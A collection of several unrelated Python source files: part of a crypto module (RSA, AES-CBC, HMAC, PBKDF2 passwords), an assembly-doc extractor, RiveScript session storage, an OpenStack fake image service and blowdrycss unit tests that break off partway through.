# base64-encodes data and thus is ascii-compatible.
def AsPEM(self):
return self.SerializeToBytes()
def AsPassphraseProtectedPEM(self, passphrase):
if self._value is None:
return ""
return self._value.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.BestAvailableEncryption(passphrase))
def KeyLen(self):
if self._value is None:
return 0
return self._value.key_size
# TODO(amoser): Get rid of those.
# Conserve old names for backwards compatibility.
class PEMPrivateKey(RSAPrivateKey):
pass
class PEMPublicKey(RSAPublicKey):
pass
class Hash(rdf_structs.RDFProtoStruct):
"""A hash object containing multiple digests."""
protobuf = jobs_pb2.Hash
rdf_deps = [
rdf_standard.AuthenticodeSignedData,
rdfvalue.HashDigest,
]
__hash__ = rdfvalue.RDFValue.__hash__
class SignedBlob(rdf_structs.RDFProtoStruct):
"""A signed blob.
The client can receive and verify a signed blob (e.g. driver or executable
binary). Once verified, the client may execute this.
"""
protobuf = jobs_pb2.SignedBlob
def Verify(self, public_key):
"""Verify the data in this blob.
Args:
public_key: The public key to use for verification.
Returns:
True when verification succeeds.
Raises:
rdfvalue.DecodeError if the data is not suitable verified.
"""
if self.digest_type != self.HashType.SHA256:
raise rdfvalue.DecodeError("Unsupported digest.")
if self.signature_type not in [
self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS
]:
raise rdfvalue.DecodeError("Unsupported signature type.")
try:
public_key.Verify(self.data, self.signature)
except InvalidSignature as e:
raise rdfvalue.DecodeError("Could not verify blob. Error: %s" % e)
return True
def Sign(self, data, signing_key, verify_key=None):
"""Use the data to sign this blob.
Args:
data: String containing the blob data.
signing_key: The key to sign with.
verify_key: Key to verify with. If None we assume the signing key also
contains the public key.
Returns:
self for call chaining.
"""
if signing_key.KeyLen() < 2048:
logging.warning("signing key is too short.")
self.signature = signing_key.Sign(data)
self.signature_type = self.SignatureType.RSA_PKCS1v15
self.digest = hashlib.sha256(data).digest()
self.digest_type = self.HashType.SHA256
self.data = data
# Test we can verify before we send it off.
if verify_key is None:
verify_key = signing_key.GetPublicKey()
# Verify our own data.
self.Verify(verify_key)
return self
class EncryptionKey(rdfvalue.RDFPrimitive):
"""Base class for encryption keys."""
protobuf_type = "bytes"
def __init__(self, initializer=None):
if initializer is None:
super().__init__(b"")
elif isinstance(initializer, EncryptionKey):
super().__init__(initializer.RawBytes())
else:
precondition.AssertType(initializer, bytes)
if len(initializer) % 8:
raise CipherError("Invalid key length %d (%s)." %
(len(initializer) * 8, initializer))
super().__init__(initializer)
self.length = 8 * len(self._value)
if 0 < self.length < 128: # Check length if _value is not empty.
raise CipherError("Key too short (%d): %s" % (self.length, initializer))
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromHumanReadable(cls, string: Text):
precondition.AssertType(string, Text)
return cls(binascii.unhexlify(string))
def __str__(self) -> Text:
return "%s (%s)" % (self.__class__.__name__, self.AsHexDigest())
def __len__(self) -> int:
return len(self._value)
def AsHexDigest(self) -> Text:
return text.Hexify(self._value)
def SerializeToBytes(self):
return self._value
@classmethod
def GenerateKey(cls, length=128):
return cls(os.urandom(length // 8))
@classmethod
def GenerateRandomIV(cls, length=128):
return cls.GenerateKey(length=length)
def RawBytes(self):
return self._value
# TODO(amoser): Size is now flexible, this class makes no sense anymore.
class AES128Key(EncryptionKey):
length = 128
class AutoGeneratedAES128Key(AES128Key):
"""Like AES128Key, but its UI edit box is prefilled with generated key."""
def __init__(self, initializer=None, **kwargs):
if isinstance(initializer, AES128Key):
super().__init__(initializer=initializer.RawBytes(), **kwargs)
else:
super().__init__(initializer=initializer, **kwargs)
class StreamingCBCEncryptor(object):
"""A class to stream data to a CBCCipher object."""
def __init__(self, cipher):
self._cipher = cipher
self._encryptor = cipher.GetEncryptor()
self._overflow_buffer = b""
self._block_size = len(cipher.key)
def Update(self, data):
data = self._overflow_buffer + data
overflow_count = len(data) % self._block_size
length_to_encrypt = len(data) - overflow_count
to_encrypt = data[:length_to_encrypt]
self._overflow_buffer = data[length_to_encrypt:]
return self._encryptor.update(to_encrypt)
def Finalize(self):
res = self._encryptor.update(self._cipher.Pad(self._overflow_buffer))
res += self._encryptor.finalize()
return res
class AES128CBCCipher(object):
"""A Cipher using AES128 in CBC mode and PKCS7 for padding."""
algorithm = None
def __init__(self, key, iv):
"""Init.
Args:
key: The key, a rdf_crypto.EncryptionKey instance.
iv: The iv, a rdf_crypto.EncryptionKey instance.
"""
self.key = key.RawBytes()
self.iv = iv.RawBytes()
def Pad(self, data):
padder = sym_padding.PKCS7(128).padder()
return padder.update(data) + padder.finalize()
def UnPad(self, padded_data):
unpadder = sym_padding.PKCS7(128).unpadder()
return unpadder.update(padded_data) + unpadder.finalize()
def GetEncryptor(self):
return ciphers.Cipher(
algorithms.AES(self.key), modes.CBC(self.iv),
backend=openssl.backend).encryptor()
def Encrypt(self, data):
"""A convenience method which pads and encrypts at once."""
encryptor = self.GetEncryptor()
padded_data = self.Pad(data)
try:
return encryptor.update(padded_data) + encryptor.finalize()
except ValueError as e:
raise CipherError(e)
def GetDecryptor(self):
return ciphers.Cipher(
algorithms.AES(self.key), modes.CBC(self.iv),
backend=openssl.backend).decryptor()
def Decrypt(self, data):
"""A convenience method which pads and decrypts at once."""
decryptor = self.GetDecryptor()
try:
padded_data = decryptor.update(data) + decryptor.finalize()
return self.UnPad(padded_data)
except ValueError as e:
raise CipherError(e)
class SymmetricCipher(rdf_structs.RDFProtoStruct):
"""Abstract symmetric cipher operations."""
protobuf = jobs_pb2.SymmetricCipher
rdf_deps = [
EncryptionKey,
]
@classmethod
def Generate(cls, algorithm):
if algorithm != cls.Algorithm.AES128CBC:
raise RuntimeError("Algorithm not supported.")
return cls(
_algorithm=algorithm,
_key=EncryptionKey.GenerateKey(length=128),
_iv=EncryptionKey.GenerateKey(length=128))
def _get_cipher(self):
if self._algorithm != self.Algorithm.AES128CBC:
raise CipherError("Unknown cipher type %s" % self._algorithm)
return AES128CBCCipher(self._key, self._iv)
def Encrypt(self, data):
if self._algorithm == self.Algorithm.NONE:
raise TypeError("Empty encryption is not allowed.")
return self._get_cipher().Encrypt(data)
def Decrypt(self, data):
if self._algorithm == self.Algorithm.NONE:
raise TypeError("Empty encryption is not allowed.")
return self._get_cipher().Decrypt(data)
class HMAC(object):
"""A wrapper for the cryptography HMAC object."""
def __init__(self, key, use_sha256=False):
# We store the raw key from cryptography.io.
if isinstance(key, EncryptionKey):
key = key.RawBytes()
self.key = key
self._hmac = self._NewHMAC(use_sha256=use_sha256)
def _NewHMAC(self, use_sha256=False):
if use_sha256:
hash_algorithm = hashes.SHA256()
else:
hash_algorithm = hashes.SHA1()
return hmac.HMAC(self.key, hash_algorithm, backend=openssl.backend)
def Update(self, data):
self._hmac.update(data)
def Finalize(self):
return self._hmac.finalize()
def HMAC(self, message, use_sha256=False):
"""Calculates the HMAC for a given message."""
h = self._NewHMAC(use_sha256=use_sha256)
h.update(message)
return h.finalize()
def Verify(self, message, signature):
"""Verifies the signature for a given message."""
siglen = len(signature)
if siglen == 20:
hash_algorithm = hashes.SHA1()
elif siglen == 32:
hash_algorithm = hashes.SHA256()
else:
raise VerificationError("Invalid signature length %d." % siglen)
h = hmac.HMAC(self.key, hash_algorithm, backend=openssl.backend)
h.update(message)
try:
h.verify(signature)
return True
except exceptions.InvalidSignature as e:
raise VerificationError(e)
class Password(rdf_structs.RDFProtoStruct):
"""A password stored in the database."""
protobuf = jobs_pb2.Password
def _CalculateHash(self, password, salt, iteration_count):
kdf = pbkdf2.PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=iteration_count,
backend=openssl.backend)
return kdf.derive(password)
def SetPassword(self, password):
self.salt = b"%016x" % random.UInt64()
self.iteration_count = 100000
# prevent non-descriptive 'key_material must be bytes' error later
if isinstance(password, Text):
password = password.encode("utf-8")
self.hashed_pwd = self._CalculateHash(password, self.salt,
self.iteration_count)
def CheckPassword(self, password):
# prevent non-descriptive 'key_material must be bytes' error later
if isinstance(password, Text):
password = password.encode("utf-8")
h = self._CalculateHash(password, self.salt, self.iteration_count)
return constant_time.bytes_eq(h, self.hashed_pwd)
| |
#!/usr/bin/env python
# vim: sw=4 ts=4 et smarttab encoding=UTF-8
from __future__ import print_function
import sys, subprocess, shlex
from copy import deepcopy
BLACK, R, G, Y, B, M, C = ["\x1b[3"+str(x)+"m" for x in range(0, 7)]
N = "\x1b[0m"
class Regs(object):
valids = (['rax', 'rbx', 'rcx', 'rdx', 'rdi', 'rsi', 'rbp'] +
['r' + str(i) for i in range(8, 16)] + ['*'])
def __init__(self, regs, parent=None):
if type(regs) == type(set()):
self.regs = regs
elif type(regs) == type(""):
self.regs = set([x.strip() for x in regs.split(",")
if x.strip() != ''])
else:
raise Exception("Unexpected regs type " + str(type(regs)) +
" for regs " + str(regs))
for r in self.regs:
if r not in self.valids:
print(parent.file if parent else "")
raise Exception("Invalid register " + r)
def __str__(self):
if '*' in self.regs:
return '*'
x = [r for r in self.regs]
x.sort(lambda x, y: cmp(self.valids.index(x), self.valids.index(y)))
return ', '.join(x)
def __eq__(self, x):
assert isinstance(x, Regs)
return str(self) == str(x)
def __ne__(self, x):
return not (self == x)
def __repr__(self):
return "Regs(\"" + str(self) + "\")"
def __len__(self):
return len(self.regs)
def __add__(self, y):
assert isinstance(y, Regs)
return Regs(self.regs | y.regs)
def __sub__(self, y):
assert isinstance(y, Regs)
if '*' in y.regs:
return Regs(set([]))
return Regs(self.regs - y.regs)
# TODO: Full blown type handling.
class Subtype(object):
def __init__(self, type):
self.type = type
def __str__(self):
return self.type
class Type(object):
def __init__(self, type):
self.type = [Subtype(x.strip()) for x in type.split("->")
if x.strip() != '']
def __str__(self):
return " -> ".join(str(t) for t in self.type)
def __len__(self):
return len(self.type)
class Proc(object):
def __init__(self, parent, title, desc, file, line, cur):
self.aliases = []
self.parent = parent
self.title = title
self.description = desc
self.file = file
self.line = line
if ':' in cur:
cur[':'] = Type(cur[':'])
else:
cur[':'] = Type("")
if '=' in cur:
self.aliases += [x.strip() for x in cur['='].split(',')]
if '-' in cur:
cur['-'] = Regs(cur['-'], self)
else:
cur['-'] = Regs("*")
if '+' in cur:
cur['+'] = Regs(cur['+'])
else:
cur['+'] = Regs("")
if '.' in cur:
cur['.'] = map(lambda x: x.strip(), cur['.'].split(','))
else:
cur['.'] = []
if ' ' not in cur:
cur[' '] = ''
self.cur = cur
self.full = self.cur[' ']
self.type = self.cur[':']
self.uses = self.cur['.']
self.keepregs = self.cur['+']
self.useregs = self.cur['-']
def get_consumption(self, past=[]):
rs = deepcopy(self.useregs)
for p in self.uses:
if p not in past:
if p not in self.parent.procs:
raise Exception("Proc " + self.title + " refers to"+
" nonexisting proc " + p)
rs += self.parent.procs[p].get_consumption(past + [self.title])
rs = rs - self.keepregs
return rs
def prettyprint(self, file = False, full=False):
E = N + "\n"
o = ""
o += M + self.title + N + ":"
o += E + ";!\t" + self.description
if file:
o += E + "; FILE\t" + G + self.file + N + ":" + R + str(self.line)
if self.type:
o += E + ";:\t" + C + str(self.type)
if len(self.keepregs) > 0:
o += E + ";+\t" + G + str(self.keepregs)
if len(self.useregs - self.keepregs) > 0:
o += E + ";-\t" + R + str(self.useregs)
if (self.useregs - self.keepregs) != self.get_consumption():
o += E + ";- TOT:\t" + R + str(self.get_consumption())
if full and self.aliases:
o += E + ";=\t" + M + ", ".join(self.aliases)
if full and self.full.strip():
o += E + "; " + Y + (E + "; " + Y).join(self.full.strip().split('\n'))
return o + N
def __str__(self):
return self.prettyprint()
class YHBTDoc(object):
def _titlify(self, str, clas, ctx):
def f(str):
if clas == '':
return str
return clas+'.'+str
if str[0:4] == "proc":
return f(str.split(',')[1].strip())
if str[0:7] == "intproc":
return f(str[8:].split(',')[0].strip())
if str[0:5] == "macro" or str[0:5] == "class":
return str[6:].split(" ")[0]
if len(str) > 0 and str[-1] == ':':
return f(str.strip()[:-1])
raise Exception, "Couldn't find the name of \"" + str + "\", " + repr(ctx)
def __init__(self):
_ = subprocess.Popen(
shlex.split("find . -iname '*.asm' -print0 -o -iname '*.h' -print0"),
stdout=subprocess.PIPE)
self.files = _.stdout.read().split('\0')
self.procs = {} # Map (String procname) Proc
self.fprocs = {} # Map (String file) (Map (String procname=) Proc)
self.fdocs = {} # Map (String filename) (String file level documentation)
ctx = ("", "")
for f in self.files:
if f == '': continue
lines = map(lambda x: x.strip(), open(f).read().split('\n'))
comment = False
clas = ""
desc = ""
cur = {}
lnum = 0
for l in lines:
didit = False
ctx = (f, lnum+1)
if l[0:2] == ";!": # Start of a comment block
desc = l[2:].strip()
comment = True
if comment == True and l[0:1] != ';': # End of a comment block
comment = False
titles = [self._titlify(l, clas, ctx)]
cur["file"] = f
proc = Proc(self, titles[0], desc, f, lnum, cur)
titles += proc.aliases
[self.procs.__setitem__(title, proc) for title in titles]
self.fprocs.setdefault(f, {})[titles[0]] = proc
cur = {}
didit = True
if comment == True: # Add to a comment block.
if len(l) > 2:
cur[l[1]] = (cur.get(l[1], "") + l[2:] + '\n')
if l[0:2] == ";;": # File level comment
self.fdocs[f] = self.fdocs.get(f, "") + l[2:] + '\n'
if l[0:6] == "class ": # The class we're in.
clas = l[6:].strip()
if l[0:8] == "quaject ": # For naming purposes a quaject is a class.
clas = l[8:]
if didit == False and (l[0:5] == "proc " or
l[0:8] == "intproc ")\
and 'IGNORE' not in l:
print(repr(ctx)+": "+l+": Lacking doc.", file=sys.stderr)
if l[0:8] == "endclass" or l[0:10] == "endquaject":
clas = ""
lnum += 1
if f not in self.fdocs:
print("File", f, "lacking fdoc.")
if cur != {} or comment != False:
print(repr(ctx)+": Unended comment block.", file=sys.stderr)
| |
# RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
from __future__ import unicode_literals
import copy
class SessionManager(object):
"""Base class for session management for RiveScript.
The session manager keeps track of getting and setting user variables,
for example when the ``<set>`` or ``<get>`` tags are used in RiveScript
or when the API functions like ``set_uservar()`` are called.
By default RiveScript stores user sessions in memory and provides methods
to export and import them (e.g. to persist them when the bot shuts down
so they can be reloaded). If you'd prefer a more 'active' session storage,
for example one that puts user variables into a database or cache, you can
create your own session manager that extends this class and implements its
functions.
See the ``eg/sessions`` example from the source of rivescript-python at
https://github.com/aichaos/rivescript-python for an example.
The constructor takes no required parameters. You can feel free to define
``__init__()`` however you need to.
"""
def set(self, username, args):
"""Set variables for a user.
Args:
username (str): The username to set variables for.
args (dict): Key/value pairs of variables to set for the user.
The values are usually strings, but they can be other types
as well (e.g. arrays or other dicts) for some internal data
structures such as input/reply history. A value of ``NoneType``
should indicate that the key should be deleted from the session
store.
"""
raise NotImplementedError
def get(self, username, key):
"""Retrieve a stored variable for a user.
If the user doesn't exist, this should return ``None``. If the user
*does* exist, but the key does not, this should return the
string value ``"undefined"``.
Args:
username (str): The username to retrieve variables for.
key (str): The specific variable name to retrieve.
Returns:
str: The value of the requested key, "undefined", or ``NoneType``.
"""
raise NotImplementedError
def get_any(self, username):
"""Retrieve all stored variables for a user.
If the user doesn't exist, this should return ``None``.
Args:
username (str): The username to retrieve variables for.
Returns:
dict: Key/value pairs of all stored data for the user, or ``NoneType``.
"""
raise NotImplementedError
def get_all(self):
"""Retrieve all variables about all users.
This should return a dict of dicts, where the top level keys are the
usernames of every user your bot has data for, and the values are dicts
of key/value pairs of those users. For example::
{ "user1": {
"topic": "random",
"name": "Alice",
},
"user2": {
"topic": "random",
"name": "Bob",
},
}
Returns:
dict
"""
raise NotImplementedError
def reset(self, username):
"""Reset all variables stored about a particular user.
Args:
username (str): The username to flush all data for.
"""
raise NotImplementedError
def reset_all(self):
"""Reset all variables for all users."""
raise NotImplementedError
def freeze(self, username):
"""Make a snapshot of the user's variables.
This should clone and store a snapshot of all stored variables for the
user, so that they can later be restored with ``thaw()``. This
implements the RiveScript ``freeze_uservars()`` method.
Args:
username (str): The username to freeze variables for.
"""
raise NotImplementedError
def thaw(self, username, action="thaw"):
"""Restore the frozen snapshot of variables for a user.
This should replace *all* of a user's variables with the frozen copy
that was snapshotted with ``freeze()``. If there are no frozen
variables, this function should be a no-op (maybe issue a warning?)
Args:
username (str): The username to restore variables for.
action (str):
An action to perform on the variables. Valid options are:
* ``thaw``: Restore the variables and delete the frozen copy (default).
* ``discard``: Don't restore the variables, just delete the frozen copy.
* ``keep``: Restore the variables and keep the copy still.
"""
raise NotImplementedError
def default_session(self):
"""The default session data for a new user.
You do not need to override this function. This returns a ``dict`` with
the default key/value pairs for new sessions. By default, the
session variables are as follows::
{
"topic": "random"
}
Returns:
dict: A dict of default key/value pairs for new user sessions.
"""
return dict(
topic="random",
)
class MemorySessionStorage(SessionManager):
"""The default in-memory session store for RiveScript.
This session manager keeps all user and state information in system
memory and doesn't persist anything to disk by default. This is suitable
for many simple use cases. User variables can be persisted and reloaded
from disk by using the RiveScript API functions ``get_uservars()`` and
``set_uservars()`` -- for example, you can get export all user variables
and save them to disk as a JSON file when your program shuts down, and on
its next startup, read the JSON file from disk and use ``set_uservars()``
to put them back into the in-memory session manager.
If you'd like to implement your own session manager, for example to use
a database to store/retrieve user variables, you should extend the base
``SessionManager`` class and implement all of its functions.
Parameters:
warn (function): A function to be called with an error message to
notify when one of the functions fails due to a user not existing.
If not provided, then no warnings will be emitted from this module.
"""
def __init__(self, warn=None, *args, **kwargs):
self._fwarn = warn
self._users = {}
self._frozen = {}
def _warn(self, *args, **kwargs):
if self._fwarn is not None:
self._fwarn(*args, **kwargs)
def set(self, username, vars):
if not username in self._users:
self._users[username] = self.default_session()
for key, value in vars.items():
if value is None:
self._users[username].pop(key, None)
else:
self._users[username][key] = value
def get(self, username, key, default="undefined"):
if not username in self._users:
return None
return self._users[username].get(key, default)
def get_any(self, username):
if not username in self._users:
return None
return copy.deepcopy(self._users[username])
def get_all(self):
return copy.deepcopy(self._users)
def reset(self, username):
del self._users[username]
def reset_all(self):
self._users = {}
def freeze(self, username):
if username in self._users:
self._frozen[username] = copy.deepcopy(self._users[username])
else:
self._warn("Can't freeze vars for user " + username + ": not found!")
def thaw(self, username, action="thaw"):
if username in self._frozen:
# What are we doing?
if action == "thaw":
# Thawing them out.
self._users[username] = copy.deepcopy(self._frozen[username])
del self._frozen[username]
elif action == "discard":
# Just discard the frozen copy.
del self._frozen[username]
elif action == "keep":
# Keep the frozen copy afterward.
self._users[username] = copy.deepcopy(self._frozen[username])
else:
self._warn("Unsupported thaw action")
else:
self._warn("Can't thaw vars for user " + username + ": not found!")
class NullSessionStorage(SessionManager):
"""The null session manager doesn't store any user variables.
This is used by the unit tests and isn't practical for real world usage,
as the bot would be completely unable to remember any user variables or
history.
"""
def set(self, *args, **kwargs):
pass
def get(self, *args, **kwargs):
return "undefined"
def get_any(self, *args, **kwargs): # pragma: no cover
return {}
def get_all(self, *args, **kwargs): # pragma: no cover
return {}
def reset(self, *args, **kwargs): # pragma: no cover
pass
def reset_all(self, *args, **kwargs): # pragma: no cover
pass
def freeze(self, *args, **kwargs): # pragma: no cover
pass
def thaw(self, *args, **kwargs): # pragma: no cover
pass
| |
# Copyright 2011 Justin Santa Barbara
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of a fake image service."""
import copy
import datetime
import uuid
from oslo.config import cfg
from nova import exception
import nova.image.glance
from nova.openstack.common import log as logging
CONF = cfg.CONF
CONF.import_opt('null_kernel', 'nova.compute.api')
LOG = logging.getLogger(__name__)
class _FakeImageService(object):
"""Mock (fake) image service for unit testing."""
def __init__(self):
self.images = {}
# NOTE(justinsb): The OpenStack API can't upload an image?
# So, make sure we've got one..
timestamp = datetime.datetime(2011, 1, 1, 1, 2, 3)
image1 = {'id': '155d900f-4e14-4e4c-a73d-069cbf4541e6',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': False,
'container_format': 'raw',
'disk_format': 'raw',
'size': '25165824',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel,
'architecture': 'x86_64'}}
image2 = {'id': 'a2459075-d96c-40d5-893e-577ff92e721c',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': True,
'container_format': 'ami',
'disk_format': 'ami',
'size': '58145823',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel}}
image3 = {'id': '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': True,
'container_format': None,
'disk_format': None,
'size': '83594576',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel}}
image4 = {'id': 'cedef40a-ed67-4d10-800e-17455edce175',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': True,
'container_format': 'ami',
'disk_format': 'ami',
'size': '84035174',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel}}
image5 = {'id': 'c905cedb-7281-47e4-8a62-f26bc5fc4c77',
'name': 'fakeimage123456',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': True,
'container_format': 'ami',
'disk_format': 'ami',
'size': '26360814',
'properties': {'kernel_id':
'155d900f-4e14-4e4c-a73d-069cbf4541e6',
'ramdisk_id': None}}
image6 = {'id': 'a440c04b-79fa-479c-bed1-0b816eaec379',
'name': 'fakeimage6',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': False,
'container_format': 'ova',
'disk_format': 'vhd',
'size': '49163826',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel,
'architecture': 'x86_64',
'auto_disk_config': 'False'}}
image7 = {'id': '70a599e0-31e7-49b7-b260-868f441e862b',
'name': 'fakeimage7',
'created_at': timestamp,
'updated_at': timestamp,
'deleted_at': None,
'deleted': False,
'status': 'active',
'is_public': False,
'container_format': 'ova',
'disk_format': 'vhd',
'size': '74185822',
'properties': {'kernel_id': CONF.null_kernel,
'ramdisk_id': CONF.null_kernel,
'architecture': 'x86_64',
'auto_disk_config': 'True'}}
self.create(None, image1)
self.create(None, image2)
self.create(None, image3)
self.create(None, image4)
self.create(None, image5)
self.create(None, image6)
self.create(None, image7)
self._imagedata = {}
super(_FakeImageService, self).__init__()
#TODO(bcwaldon): implement optional kwargs such as limit, sort_dir
def detail(self, context, **kwargs):
"""Return list of detailed image information."""
return copy.deepcopy(self.images.values())
def download(self, context, image_id, dst_path=None, data=None):
self.show(context, image_id)
if data:
data.write(self._imagedata.get(image_id, ''))
elif dst_path:
with open(dst_path, 'wb') as data:
data.write(self._imagedata.get(image_id, ''))
def show(self, context, image_id):
"""Get data about specified image.
Returns a dict containing image data for the given opaque image id.
"""
image = self.images.get(str(image_id))
if image:
return copy.deepcopy(image)
LOG.warn('Unable to find image id %s. Have images: %s',
image_id, self.images)
raise exception.ImageNotFound(image_id=image_id)
def create(self, context, metadata, data=None):
"""Store the image data and return the new image id.
:raises: Duplicate if the image already exist.
"""
image_id = str(metadata.get('id', uuid.uuid4()))
metadata['id'] = image_id
if image_id in self.images:
raise exception.CouldNotUploadImage(image_id=image_id)
self.images[image_id] = copy.deepcopy(metadata)
if data:
self._imagedata[image_id] = data.read()
return self.images[image_id]
def update(self, context, image_id, metadata, data=None,
purge_props=False):
"""Replace the contents of the given image with the new data.
:raises: ImageNotFound if the image does not exist.
"""
if not self.images.get(image_id):
raise exception.ImageNotFound(image_id=image_id)
if purge_props:
self.images[image_id] = copy.deepcopy(metadata)
else:
image = self.images[image_id]
try:
image['properties'].update(metadata.pop('properties'))
except KeyError:
pass
image.update(metadata)
return self.images[image_id]
def delete(self, context, image_id):
"""Delete the given image.
:raises: ImageNotFound if the image does not exist.
"""
removed = self.images.pop(image_id, None)
if not removed:
raise exception.ImageNotFound(image_id=image_id)
def get_location(self, context, image_id):
if image_id in self.images:
return 'fake_location'
return None
_fakeImageService = _FakeImageService()
def FakeImageService():
return _fakeImageService
def FakeImageService_reset():
global _fakeImageService
_fakeImageService = _FakeImageService()
def get_valid_image_id():
return _fakeImageService.images.keys()[0]
def stub_out_image_service(stubs):
image_service = FakeImageService()
stubs.Set(nova.image.glance, 'get_remote_image_service',
lambda x, y: (image_service, y))
stubs.Set(nova.image.glance, 'get_default_image_service',
lambda: image_service)
return image_service
| |
# python 2
from __future__ import absolute_import, unicode_literals
from builtins import bytes
# builtins
from unittest import TestCase, main
import sys
from io import StringIO
import os
# custom
from blowdrycss.utilities import unittest_file_path, delete_file_paths
import blowdrycss.blowdry as blowdry
import blowdrycss_settings as settings
__author__ = 'chad nelson'
__project__ = 'blowdrycss'
class TestMain(TestCase):
def test_boilerplate_markdown_docs(self):
# Save original values.
project_directory = settings.project_directory
markdown_directory = settings.markdown_directory
markdown_docs = settings.markdown_docs
# Change settings
settings.project_directory = unittest_file_path(folder='test_examplesite') # Prevent 'examplesite' creation.
settings.markdown_directory = unittest_file_path(folder='test_markdown')
settings.markdown_docs = True
expected_files = (
os.path.join(settings.markdown_directory, 'clashing_aliases.md'),
os.path.join(settings.markdown_directory, 'property_aliases.md'),
)
for expected_file in expected_files: # Ensure the files do not exist.
if os.path.isfile(expected_file):
os.remove(expected_file)
blowdry.boilerplate() # Run It
for expected_file in expected_files:
self.assertTrue(os.path.isfile(expected_file), msg=expected_file)
os.remove(expected_file) # Delete
# Reset settings values.
settings.project_directory = project_directory
settings.markdown_directory = markdown_directory
settings.markdown_docs = markdown_docs
def test_boilerplate_rst_docs(self):
# Save original values.
project_directory = settings.project_directory
docs_directory = settings.docs_directory
rst_docs = settings.rst_docs
# Change settings
settings.project_directory = unittest_file_path(folder='test_examplesite') # Prevent 'examplesite' creation.
settings.docs_directory = unittest_file_path(folder='test_docs')
settings.rst_docs = True
expected_files = (
os.path.join(settings.docs_directory, 'clashing_aliases.rst'),
os.path.join(settings.docs_directory, 'property_aliases.rst'),
)
for expected_file in expected_files: # Ensure the files do not exist.
if os.path.isfile(expected_file):
os.remove(expected_file)
blowdry.boilerplate()
for expected_file in expected_files:
self.assertTrue(os.path.isfile(expected_file), msg=expected_file)
os.remove(expected_file) # Delete
# Reset settings values.
settings.project_directory = project_directory
settings.docs_directory = docs_directory
settings.rst_docs = rst_docs
def test_parse(self):
expected_class_set = {
u'medium-up', u'border-1px-solid-gray', u'padding-5', u'margin-top-10', u'display-none',
u'width-50', u'height-150px', u'color-hfff', u'font-size-25-s', u't-align-center',
u'display-inline', u'margin-top-50px', u'talign-center', u'width-150',
u'display-960-up-i', u'font-size-48', u'bold', u'margin-20', u'bgc-h000', u'c-red-i-hover',
u'hfff-hover-i', u'padding-10', u'bgc-hf8f8f8', u'text-align-center',
u'c-blue', u'height-200',
u'padding-10-s', u'height-50px', u'padding-top-10',
# Invalid though they exist in the HTML
# u'addclass3', u'addclass6', u'addclass1', u'addclass4', u'addclass5', u'hide', u'alex-grey-125', u'b',
}
substrings = [
'~~~ blowdrycss started ~~~',
'CSSBuilder Running...',
'.css',
]
project_directory = settings.project_directory
settings.project_directory = unittest_file_path()
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
class_set, css_text = blowdry.parse(recent=False, class_set=set(), css_text=b'')
self.assertTrue(expected_class_set == class_set, msg=class_set)
output = out.getvalue()
for substring in substrings:
self.assertTrue(substring in output, msg=output + '\tsubstring: ' + substring)
finally:
sys.stdout = saved_stdout
settings.project_directory = project_directory
def test_parse_on_modify_class_set(self):
expected_class_set = {
'green', 'purple-medium-up', 'bgc-h454545', # Pre-existing
'pink-hover', # Modify.html
# Exists in HTML but should not be returned
# 'not-valid',
}
substrings = [
'~~~ blowdrycss started ~~~',
'CSSBuilder Running...',
'.css',
]
project_directory = settings.project_directory
css_directory = settings.css_directory
settings.project_directory = unittest_file_path()
settings.css_directory = unittest_file_path()
current_set = {'green', 'purple-medium-up', 'bgc-h454545', }
css_file = unittest_file_path(filename='blowdry.css') # CSS file
css_min_file = unittest_file_path(filename='blowdry.min.css') # CSS.min file
with open(css_file, 'w') as generic_file:
generic_file.write('test test test')
modify_file = unittest_file_path(filename='modify.html') # Modify file
with open(modify_file, 'w') as generic_file:
generic_file.write('<html><div class="pink-hover not-valid">Modified</div></html>')
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
class_set, css_text = blowdry.parse(recent=True, class_set=current_set)
self.assertTrue(expected_class_set == class_set, msg=class_set)
output = out.getvalue()
for substring in substrings:
self.assertTrue(substring in output, msg=output + '\tsubstring: ' + substring)
finally:
sys.stdout = saved_stdout
settings.project_directory = project_directory
settings.css_directory = css_directory
delete_file_paths((css_file, css_min_file, modify_file, ))
def test_parse_on_modify_css_text_PREXISTING(self):
# WARNING Indentation must be preserved.
expected_css_text = b""".green {
color: green
}
.pink-hover:hover {
color: pink
}"""
substrings = [
'~~~ blowdrycss started ~~~',
'CSSBuilder Running...',
